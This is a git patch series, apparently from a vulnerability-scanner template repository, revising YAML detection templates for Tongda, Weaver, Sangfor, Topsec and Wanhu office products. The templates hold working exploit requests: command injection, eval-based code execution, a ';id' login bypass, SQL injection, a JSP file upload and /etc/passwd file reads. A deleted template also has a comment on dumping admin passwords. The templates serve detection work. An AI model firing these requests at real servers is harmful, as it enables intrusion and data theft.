b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 4b2769ee46..ceb2b8d600 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: + max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From 9e8623a907b703d3b27bd8faa882f295ee4bb60b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha Date: Fri, 15 Sep 2023 00:41:38 +0530 Subject: [PATCH 0355/1090] templates update -2 --- .../sangfor/sangfor-login-rce.yaml | 5 +- ...eak.yaml => seeyon-initdata-exposure.yaml} | 0 ...ile.yaml => tongda-action-uploadfile.yaml} | 17 +++--- ...yaml => tongda-contact-list-exposure.yaml} | 15 ++--- .../tongda/tongda-getdata-rce.yaml | 22 ++++--- .../tongda/tongda-insert-sqli.yaml | 6 +- .../tongda/tongda-meeting-unauth.yaml | 29 +++------- .../topsec/topsec-topapplb-auth-bypass.yaml | 37 ++++++++++++ .../wanhu/wanhu-documentedit-sqli.yaml | 9 +-- .../ecology-jqueryfiletree-traversal.yaml | 34 +++++++++++ ...-e-bridge-linux-saveyzjfile-file-read.yaml | 45 --------------- ...-bridge-windows-saveyzjfile-file-read.yaml | 45 --------------- .../weaver/weaver-e-cology-getdata-sqli.yaml | 33 ----------- .../weaver-e-cology-getsqldata-sqli.yaml | 35 ------------ ...-e-cology-hrmcarreerapplyperview-sqli.yaml | 30 ---------- ...gy-jqueryfiletree-directory-traversal.yaml | 33 ----------- ...reeuploadaction-arbitrary-file-upload.yaml | 53 ----------------- .../weaver/weaver-ebridge-lfi.yaml | 50 ++++++++++++++++ ...aml => weaver-ecology-bshservlet-rce.yaml} | 26 +++++---- .../weaver-ecology-getsqldata-sqli.yaml | 39 +++++++++++++ .../weaver/weaver-ecology-hrmcareer-sqli.yaml | 35 ++++++++++++ .../weaver-ktreeuploadaction-file-upload.yaml | 57 +++++++++++++++++++ 22 files changed, 316 insertions(+), 339 deletions(-) rename http/vulnerabilities/seeyon/{seeyon-oa-initdataassess-infoleak.yaml => seeyon-initdata-exposure.yaml} (100%) rename http/vulnerabilities/tongda/{tongda-v2017-action-uploadfile.yaml => tongda-action-uploadfile.yaml} (85%) rename http/vulnerabilities/tongda/{tongda-contact-list-disclosure.yaml => tongda-contact-list-exposure.yaml} (68%) create mode 100755 http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml create mode 100755 http/vulnerabilities/weaver/ecology-jqueryfiletree-traversal.yaml delete mode 100644 http/vulnerabilities/weaver/weaver-e-bridge-linux-saveyzjfile-file-read.yaml delete mode 100755 http/vulnerabilities/weaver/weaver-e-cology-getsqldata-sqli.yaml delete mode 100755 http/vulnerabilities/weaver/weaver-e-cology-hrmcarreerapplyperview-sqli.yaml delete mode 100755 http/vulnerabilities/weaver/weaver-e-cology-jqueryfiletree-directory-traversal.yaml delete mode 100755 http/vulnerabilities/weaver/weaver-e-cology-ktreeuploadaction-arbitrary-file-upload.yaml create mode 100644 http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml rename http/vulnerabilities/weaver/{weaver-e-cology-bshservlet-rce.yaml => weaver-ecology-bshservlet-rce.yaml} (58%) create mode 100755 http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml create mode 100755 http/vulnerabilities/weaver/weaver-ecology-hrmcareer-sqli.yaml create mode 100755 http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml diff --git a/http/vulnerabilities/sangfor/sangfor-login-rce.yaml b/http/vulnerabilities/sangfor/sangfor-login-rce.yaml index 7cb79fe1b0..b182eaf6e1 100644 --- a/http/vulnerabilities/sangfor/sangfor-login-rce.yaml +++ b/http/vulnerabilities/sangfor/sangfor-login-rce.yaml @@ -10,9 +10,9 @@ info: - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/sangfor-login-rce.yaml metadata: max-request: 1 - fofa-query: fid="iaytNA57019/kADk8Nev7g==" verified: true - tags: sangfor,ad,rce + fofa-query: fid="iaytNA57019/kADk8Nev7g==" + tags: sangfor,rce http: - raw: @@ -23,7 +23,6 @@ http: clsMode=cls_mode_login%0Aid%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123 - matchers-condition: and matchers: - type: dsl dsl: diff --git a/http/vulnerabilities/seeyon/seeyon-oa-initdataassess-infoleak.yaml b/http/vulnerabilities/seeyon/seeyon-initdata-exposure.yaml similarity index 100% rename from http/vulnerabilities/seeyon/seeyon-oa-initdataassess-infoleak.yaml rename to http/vulnerabilities/seeyon/seeyon-initdata-exposure.yaml diff --git a/http/vulnerabilities/tongda/tongda-v2017-action-uploadfile.yaml b/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml similarity index 85% rename from http/vulnerabilities/tongda/tongda-v2017-action-uploadfile.yaml rename to http/vulnerabilities/tongda/tongda-action-uploadfile.yaml index bf8a174e26..33ebd44c35 100755 --- a/http/vulnerabilities/tongda/tongda-v2017-action-uploadfile.yaml +++ b/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml @@ -1,7 +1,7 @@ -id: tongda-v2017-action-uploadfile +id: tongda-action-uploadfile info: - name: Tongda OA v2017 action_upload.php - Arbitrary File Upload + name: Tongda OA v2017 action_upload - Arbitrary File Upload author: SleepingBag945 severity: critical description: | @@ -11,9 +11,12 @@ info: - https://github.com/shadow1ng/fscan/blob/main/WebScan/pocs/tongda-v2017-uploadfile.yml metadata: max-request: 1 - fofa-query: app="TDXK-通达OA" verified: true - tags: tongda,fileupload + fofa-query: app="TDXK-通达OA" + tags: tongda,fileupload,intrusive + +variables: + num: "999999999" http: - raw: @@ -21,8 +24,6 @@ http: POST /module/ueditor/php/action_upload.php?action=uploadfile HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjhddzlqp - X_requested_with: XMLHttpRequest - Accept-Encoding: gzip ------WebKitFormBoundaryjhddzlqp Content-Disposition: form-data; name="CONFIG[fileFieldName]" @@ -44,7 +45,7 @@ http: Content-Disposition: form-data; name="ffff"; filename="test.php" Content-Type: application/octet-stream - + ------WebKitFormBoundaryjhddzlqp Content-Disposition: form-data; name="mufile" @@ -59,7 +60,7 @@ http: matchers: - type: word words: - - "1f18933ca1e531c1eac9cccc4952a03b" + - '{{md5(num)}}' - type: status status: diff --git a/http/vulnerabilities/tongda/tongda-contact-list-disclosure.yaml b/http/vulnerabilities/tongda/tongda-contact-list-exposure.yaml similarity index 68% rename from http/vulnerabilities/tongda/tongda-contact-list-disclosure.yaml rename to http/vulnerabilities/tongda/tongda-contact-list-exposure.yaml index 732d8aca04..9f1ec30dfb 100755 --- a/http/vulnerabilities/tongda/tongda-contact-list-disclosure.yaml +++ b/http/vulnerabilities/tongda/tongda-contact-list-exposure.yaml @@ -1,19 +1,19 @@ -id: tongda-contact-list-disclosure +id: tongda-contact-list-exposure info: - name: Tongda OA v2014 Get Contactlistt - Exposure + name: Tongda OA v2014 Get Contactlistt - Sensitive Information Disclosure author: SleepingBag945 severity: medium description: | There is an information leakage vulnerability in the get_contactlist.php file of Tongda OA v2014. Attackers can obtain sensitive information through the vulnerability and conduct further attacks. reference: - - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v2014%20get_contactlist.php%20敏感信息泄漏漏洞.html - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/tongda-contact-list-disclosure.yaml metadata: max-request: 1 - fofa-query: app="TDXK-通达OA verified: true + fofa-query: app="TDXK-通达OA" tags: tongda,oa,exposure + http: - method: GET path: @@ -23,9 +23,10 @@ http: matchers: - type: word words: - - "user_uid" - - "user_name" - - "priv_name" + - 'user_uid":' + - 'user_name":' + - 'priv_name":' + condition: and - type: status status: diff --git a/http/vulnerabilities/tongda/tongda-getdata-rce.yaml b/http/vulnerabilities/tongda/tongda-getdata-rce.yaml index 8241194a68..6695fba6a2 100755 --- a/http/vulnerabilities/tongda/tongda-getdata-rce.yaml +++ b/http/vulnerabilities/tongda/tongda-getdata-rce.yaml @@ -1,7 +1,7 @@ id: tongda-getdata-rce info: - name: Tongda OA v11.9 getadata - Remoce Code Execution + name: Tongda OA v11.9 getadata - Remote Code Execution author: SleepingBag945 severity: critical description: | @@ -10,21 +10,27 @@ info: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.9%20getdata%20%E4%BB%BB%E6%84%8F%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md metadata: max-request: 1 - fofa-query: app="TDXK-通达OA" verified: true + fofa-query: app="TDXK-通达OA" tags: tongda,rce variables: - payload: "echo RCE;" + num: '999999999' + payload: "echo md5({{num}});" http: - method: GET path: - "{{BaseURL}}/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval(base64_decode(%22{{base64(payload)}}%22)))%3B/*&id=19&module=Carouselimage" + matchers-condition: and matchers: - - type: dsl - dsl: - - 'contains(body, "RCE") && contains(body, "pagelimit")' - - 'status_code == 200' - condition: and \ No newline at end of file + - type: word + words: + - '{{md5(num)}}' + - 'pagelimit' + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/tongda/tongda-insert-sqli.yaml b/http/vulnerabilities/tongda/tongda-insert-sqli.yaml index e00ff40012..0cb10d5fbd 100755 --- a/http/vulnerabilities/tongda/tongda-insert-sqli.yaml +++ b/http/vulnerabilities/tongda/tongda-insert-sqli.yaml @@ -10,8 +10,8 @@ info: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.6%20insert%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md metadata: max-request: 1 - fofa-query: app="TDXK-通达OA" verified: true + fofa-query: app="TDXK-通达OA" tags: tongda,sqli http: @@ -23,13 +23,15 @@ http: title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))<128,1,710)))# =1&_SERVER= - matchers-condition: and matchers: - type: word part: header words: - "PHPSESSID=" + - "register_for/?rid=" + condition: and + - type: status status: - 302 \ No newline at end of file diff --git a/http/vulnerabilities/tongda/tongda-meeting-unauth.yaml b/http/vulnerabilities/tongda/tongda-meeting-unauth.yaml index c36e8c5246..df831fe145 100755 --- a/http/vulnerabilities/tongda/tongda-meeting-unauth.yaml +++ b/http/vulnerabilities/tongda/tongda-meeting-unauth.yaml @@ -5,14 +5,13 @@ info: author: SleepingBag945 severity: medium description: | - Tongda Meeting Unauthorized Access wereDetected + Tongda Meeting Unauthorized Access were Detected. reference: - - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.8%20getway.php%20远程文件包含漏洞.html - - https://github.com/chaitin/xray/blob/master/pocs/tongda-meeting-unauthorized-access.yml + - https://github.com/hktalent/scan4all/blob/2a7faf7862265eab33699034fd193bcf11b44e0f/config/poc/%E9%80%9A%E8%BE%BEoa/%E9%80%9A%E8%BE%BEoa-meeting-unauthorized-access.json#L10 metadata: max-request: 1 - fofa-query: app="TDXK-通达OA verified: true + fofa-query: app="TDXK-通达OA" tags: tongda,unauth,misconfig http: @@ -20,21 +19,9 @@ http: path: - "{{BaseURL}}/general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=33165447106&view=agendaDay" - matchers-condition: and matchers: - - type: word - words: - - "creator" - - "originalTitle" - - "view" - - "type" - condition: and - - - type: word - part: header - words: - - "application/json" - - - type: status - status: - - 200 \ No newline at end of file + - type: dsl + dsl: + - status_code == 200 && contains(header, 'application/json') + - contains_all(body, 'creator\":', 'originalTitle\":', 'view\":', 'type\":') + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml b/http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml new file mode 100755 index 0000000000..fae8bd88a8 --- /dev/null +++ b/http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml @@ -0,0 +1,37 @@ +id: topsec-topapplb-auth-bypass + +info: + name: Topsec TopAppLB - Authentication Bypass + author: SleepingBag945 + severity: high + description: | + Topsec TopAppLB is vulnerable to authetication bypass .Enter any account on the login page, the password is `;id`. + reference: + - https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Topsec-TopAppLB-Any-account-Login.json + metadata: + max-request: 1 + verified: true + fofa-query: title="TopApp-LB 负载均衡系统" + tags: topsec,topapplb,auth-bypass + +http: + - raw: + - | + POST /login_check.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + userName=admin&password=%3Bid + + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 302 && status_code_2 == 200' + - 'contains(body_2,"var IsHeadMin ")' + - 'contains(header_1,"redirect.php") && !contains(tolower(header_1), "error=1")' + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/wanhu/wanhu-documentedit-sqli.yaml b/http/vulnerabilities/wanhu/wanhu-documentedit-sqli.yaml index 8ce4356906..fd801b47a6 100755 --- a/http/vulnerabilities/wanhu/wanhu-documentedit-sqli.yaml +++ b/http/vulnerabilities/wanhu/wanhu-documentedit-sqli.yaml @@ -15,17 +15,18 @@ info: fofa-query: app="万户网络-ezOFFICE" tags: wanhu,sqli + http: - raw: - | - GET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1';WAITFOR%20DELAY%20'0:0:5'-- HTTP/1.1 + @timeout: 15s + GET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1';WAITFOR%20DELAY%20'0:0:7'-- HTTP/1.1 Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded matchers: - type: dsl dsl: - - 'duration>=5' + - 'duration>=7' - 'status_code == 200' - - 'contains(body, "iSignature HTML V6")' + - 'contains_all(body, "iSignature", "DoYFSignature")' condition: and \ No newline at end of file diff --git a/http/vulnerabilities/weaver/ecology-jqueryfiletree-traversal.yaml b/http/vulnerabilities/weaver/ecology-jqueryfiletree-traversal.yaml new file mode 100755 index 0000000000..30505f4c62 --- /dev/null +++ b/http/vulnerabilities/weaver/ecology-jqueryfiletree-traversal.yaml @@ -0,0 +1,34 @@ +id: ecology-jqueryfiletree-traversal + +info: + name: Weaver E-Cology JqueryFileTree - Directory Traversal + author: SleepingBag945 + severity: medium + description: | + Panwei OA E-Cology jqueryFileTree.jsp directory traversal vulnerability. + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20jqueryFileTree.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.md?plain=1#L24 + metadata: + max-request: 1 + verified: true + shodan-query: ecology_JSessionid + fofa-query: app="泛微-协同办公OA" + tags: weaver,ecology,traversal,lfr + +http: + - method: GET + path: + - "{{BaseURL}}/hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../" + + matchers-condition: and + matchers: + - type: word + words: + - "'index.jsp','" + - "重命名" + - "新建目录" + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-e-bridge-linux-saveyzjfile-file-read.yaml b/http/vulnerabilities/weaver/weaver-e-bridge-linux-saveyzjfile-file-read.yaml deleted file mode 100644 index 7f29310417..0000000000 --- a/http/vulnerabilities/weaver/weaver-e-bridge-linux-saveyzjfile-file-read.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: weaver-e-bridge-linux-saveyzjfile-file-read - -info: - name: weaver-e-bridge-linux-saveyzjfile-file-read - author: SleepingBag945 - severity: high - description: 泛微OA E-Bridge saveYZJFile接口存在任意文件读取漏洞,攻击者通过漏洞可以读取服务器任意文件 - reference: - - https://peiqi.wgpsec.org/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Bridge%20saveYZJFile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html - tags: eBridge,weaver,oa,read - -http: - - raw: - - | - GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Accept-Encoding: gzip - - - | - GET /file/fileNoLogin/{{idname}} HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Accept-Encoding: gzip - - extractors: - - type: regex - name: idname - internal: true - group: 1 - regex: - - '"id":"(.*?)"' - - req-condition: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - status_code_1 == 200 && contains(body_1,'id') - - "status_code_2 == 200 && contains(body_2, 'root:x:0')" - condition: and - - diff --git a/http/vulnerabilities/weaver/weaver-e-bridge-windows-saveyzjfile-file-read.yaml b/http/vulnerabilities/weaver/weaver-e-bridge-windows-saveyzjfile-file-read.yaml index 505e9fa07e..e69de29bb2 100644 --- a/http/vulnerabilities/weaver/weaver-e-bridge-windows-saveyzjfile-file-read.yaml +++ b/http/vulnerabilities/weaver/weaver-e-bridge-windows-saveyzjfile-file-read.yaml @@ -1,45 +0,0 @@ -id: weaver-e-bridge-windows-saveyzjfile-file-read - -info: - name: weaver-e-bridge-windows-saveyzjfile-file-read - author: SleepingBag945 - severity: high - description: 泛微OA E-Bridge saveYZJFile接口存在任意文件读取漏洞,攻击者通过漏洞可以读取服务器任意文件 - reference: - - https://peiqi.wgpsec.org/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Bridge%20saveYZJFile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html - tags: eBridge,weaver,oa,read - -http: - - raw: - - | - GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Accept-Encoding: gzip - - - | - GET /file/fileNoLogin/{{idname}} HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Accept-Encoding: gzip - - extractors: - - type: regex - name: idname - internal: true - group: 1 - regex: - - '"id":"(.*?)"' - - req-condition: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - status_code_1 == 200 && contains(body_1,'id') - - "status_code_2 == 200 && contains(body_2, 'Program Files')" - condition: and - - diff --git a/http/vulnerabilities/weaver/weaver-e-cology-getdata-sqli.yaml b/http/vulnerabilities/weaver/weaver-e-cology-getdata-sqli.yaml index 1aa960e3cf..e69de29bb2 100755 --- a/http/vulnerabilities/weaver/weaver-e-cology-getdata-sqli.yaml +++ b/http/vulnerabilities/weaver/weaver-e-cology-getdata-sqli.yaml @@ -1,33 +0,0 @@ -id: weaver-e-cology-getdata-sqli - -info: - name: weaver-e-cology-getdata-sqli - author: SleepingBag945 - severity: high - description: 泛微e-cology OA系统的在 getdata.jsp 中,传入参数 cmd 值等于 getSelectAllId 时, 将从请求中获取 sql 参数值执行,导致 sql 注入 - reference: - - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20getdata.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html - tags: ecology,weaver,oa,sqli - -http: - - raw: - - | - GET /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20str(40198*43774)%20as%20id HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Accept-Encoding: gzip - - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "1759627252" - - type: status - status: - - 200 - -# Enhanced by md on 2022/10/31 -# select%20password%20as%20id%20from%20HrmResourceManager 解密后可登录 \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-e-cology-getsqldata-sqli.yaml b/http/vulnerabilities/weaver/weaver-e-cology-getsqldata-sqli.yaml deleted file mode 100755 index edbe68f434..0000000000 --- a/http/vulnerabilities/weaver/weaver-e-cology-getsqldata-sqli.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: weaver-e-cology-getsqldata-sqli - -info: - name: weaver-e-cology-getsqldata-sqli - author: SleepingBag945 - severity: high - description: 泛微e-cology OA系统的getSqlData接口在使用mssql数据库时,由于内置sql语句拼接不严,导致其存在sql注入漏洞 - reference: - - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20getSqlData%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html - tags: ecology,weaver,oa,sqli - -http: - - raw: - - | - GET /Api/portal/elementEcodeAddon/getSqlData?sql=sql=select%20@@version HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Accept-Encoding: gzip - - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '{"api_status":' - - '"status":true}' - condition: and - - - type: status - status: - - 200 - -# Enhanced by md on 2022/10/31 diff --git a/http/vulnerabilities/weaver/weaver-e-cology-hrmcarreerapplyperview-sqli.yaml b/http/vulnerabilities/weaver/weaver-e-cology-hrmcarreerapplyperview-sqli.yaml deleted file mode 100755 index 9eb6b931d0..0000000000 --- a/http/vulnerabilities/weaver/weaver-e-cology-hrmcarreerapplyperview-sqli.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: weaver-e-cology-hrmcarreerapplyperview-sqli - -info: - name: weaver-e-cology-hrmcarreerapplyperview-sqli - author: SleepingBag945 - severity: high - description: 泛微OA E-Cology HrmCareerApplyPerView.jsp 文件存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库敏感文件 - reference: - - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20HrmCareerApplyPerView.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html - tags: ecology,weaver,oa,sqli - -http: - - raw: - - | - GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes('MD5','abc')),db_name(1),5,6,7 HTTP/1.1 - Host: {{Hostname}} - Content-Type: text/xml;charset=UTF-8 - - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "900150983cd24fb0d6963f7d28e17f72" - - type: status - status: - - 200 - -# Enhanced by md on 2022/10/31 diff --git a/http/vulnerabilities/weaver/weaver-e-cology-jqueryfiletree-directory-traversal.yaml b/http/vulnerabilities/weaver/weaver-e-cology-jqueryfiletree-directory-traversal.yaml deleted file mode 100755 index c5f8c22310..0000000000 --- a/http/vulnerabilities/weaver/weaver-e-cology-jqueryfiletree-directory-traversal.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: weaver-e-cology-jqueryfiletree-directory-traversal - -info: - name: weaver e-cology-jqueryfiletree-directory-traversal - author: SleepingBag945 - severity: medium - description: 泛微OA E-Cology jqueryFileTree.jsp 目录遍历漏洞 - reference: - - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20jqueryFileTree.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.html - tags: weaver,e-cology,oa - -http: - - raw: - - | - GET /hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../ HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - - matchers-condition: and - matchers: - - type: word - words: - - "'index.jsp','" - - type: word - words: - - "重命名" - - type: word - words: - - "新建目录" - - type: status - status: - - 200 diff --git a/http/vulnerabilities/weaver/weaver-e-cology-ktreeuploadaction-arbitrary-file-upload.yaml b/http/vulnerabilities/weaver/weaver-e-cology-ktreeuploadaction-arbitrary-file-upload.yaml deleted file mode 100755 index 194fc8e07f..0000000000 --- a/http/vulnerabilities/weaver/weaver-e-cology-ktreeuploadaction-arbitrary-file-upload.yaml +++ /dev/null @@ -1,53 +0,0 @@ -id: weaver-e-cology-ktreeuploadaction-arbitrary-file-upload - -info: - name: weaver e-cology KtreeUploadAction arbitrary file upload - author: SleepingBag945 - severity: critical - description: 泛微E-Cology存在文件上传漏洞,攻击者可以通过KtreeUploadAction.jsp上传任意文件并且进一步进行利用 - reference: - - https://buaq.net/go-117479.html - tags: ecology,upload,fileupload,intrusive - -http: - - raw: - - | - POST /weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywgljfvib - Accept-Encoding: gzip - - ------WebKitFormBoundarywgljfvib - Content-Disposition: form-data; name="test"; filename="{{randstr}}.jsp" - Content-Type: image/jpeg - - <%out.print(43997 * 41858);new java.io.File(application.getRealPath(request.getServletPath())).delete();%> - ------WebKitFormBoundarywgljfvib-- - - - | - GET {{filename}} HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Accept-Encoding: gzip - - extractors: - - type: regex - name: filename - internal: true - group: 1 - regex: - - "','url':'(.*?)','title" - - req-condition: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - "status_code_1 == 200 && contains(body_1,'original')" - - "contains(body_2, '1841626426') && status_code_2 == 200" - condition: and - -# Enhanced by md on 2022/10/31 diff --git a/http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml b/http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml new file mode 100644 index 0000000000..4a34c16335 --- /dev/null +++ b/http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml @@ -0,0 +1,50 @@ +id: weaver-ebridge-lfi + +info: + name: Weaver E-Bidge saveYZJFile - Local File Read + author: SleepingBag945 + severity: high + description: | + There is an arbitrary file reading vulnerability in the Weaver OA E-Bridge saveYZJFile interface. An attacker can read any file on the server through the vulnerability. + reference: + - https://peiqi.wgpsec.org/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Bridge%20saveYZJFile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html + metadata: + max-request: 1 + verified: true + shodan-query: eBridge_JSessionid + fofa-query: app="泛微云桥e-Bridge" + tags: eBridge,weaver,oa,lfi,lfr,intrusive + +http: + - raw: + - | + GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl={{path}} HTTP/1.1 + Host: {{Hostname}} + + - | + GET /file/fileNoLogin/{{idname}} HTTP/1.1 + Host: {{Hostname}} + + attack: pitchfork + payloads: + path: + - file:///C:/&fileExt=txt + - file:///etc/passwd&fileExt=txt + + stop-at-first-match: true + skip-variables-check: true + matchers: + - type: dsl + dsl: + - "status_code_1 == 200 && contains_all(body_1,'id', 'filepath') && !contains(tolower(body), 'status\":\"error')" + - "status_code_2 == 200 && contains(header_2, 'filename=')" + - "contains(body_2, 'Program Files') || regex('root:.*:0:0:', body)" + condition: and + + extractors: + - type: regex + name: idname + internal: true + group: 1 + regex: + - '"id":"(.*?)"' \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-e-cology-bshservlet-rce.yaml b/http/vulnerabilities/weaver/weaver-ecology-bshservlet-rce.yaml similarity index 58% rename from http/vulnerabilities/weaver/weaver-e-cology-bshservlet-rce.yaml rename to http/vulnerabilities/weaver/weaver-ecology-bshservlet-rce.yaml index 8c56b4036a..8e5c6d62c7 100755 --- a/http/vulnerabilities/weaver/weaver-e-cology-bshservlet-rce.yaml +++ b/http/vulnerabilities/weaver/weaver-ecology-bshservlet-rce.yaml @@ -1,10 +1,16 @@ -id: weaver-e-cology-bshservlet-rce +id: weaver-ecology-bshservlet-rce 